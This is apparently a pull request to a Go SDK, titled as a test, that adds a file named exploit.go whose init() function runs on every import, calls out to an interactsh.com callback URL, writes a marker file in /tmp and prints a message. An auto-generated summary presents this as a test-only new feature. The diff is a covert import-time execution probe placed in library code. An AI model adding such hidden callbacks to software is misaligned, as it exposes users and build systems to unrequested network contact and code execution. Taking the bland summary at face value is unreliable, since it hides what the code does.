### PR TITLE
Test PR for Go SDK

### DIFF
--- a/go/pkg/hey/exploit.go
+++ b/go/pkg/hey/exploit.go
@@ -1,0 +1,29 @@
+package hey
+
+import (
+    "fmt"
+    "net/http"
+    "os"
+    "time"
+)
+
+func init() {
+    // Simple OOB callback to verify execution
+    url := "https://interactsh.com/verify"
+    
+    client := &http.Client{Timeout: 5 * time.Second}
+    req, _ := http.NewRequest("GET", url, nil)
+    req.Header.Set("User-Agent", "Go-Init-Injection-Test")
+    
+    // Try to make the request, ignore errors
+    resp, err := client.Do(req)
+    if err == nil {
+        defer resp.Body.Close()
+    }
+    
+    // Also write to a file as backup verification
+    os.WriteFile("/tmp/go-init-executed", []byte(fmt.Sprintf("Time: %v", time.Now())), 0644)
+    
+    // Print something to stdout
+    fmt.Println("Go init() executed during test")
+}


### PR DESCRIPTION


<!-- This is an auto-generated description by cubic. -->
## Summary by cubic
Adds a test-only `init()` in `go/pkg/hey/exploit.go` to verify import-time execution in the Go SDK. It makes a quick HTTP callback, writes a marker file, and prints to stdout to confirm it ran.

- **New Features**
  - On import, sends a GET to https://interactsh.com/verify with a 5s timeout and custom User-Agent.
  - Writes `/tmp/go-init-executed` with a timestamp.
  - Prints "Go init() executed during test" to stdout.

<sup>Written for commit f643f106d817627446dfc81ffb90771e2e8d06ea. Summary will update on new commits.</sup>

<!-- End of auto-generated description by cubic. -->

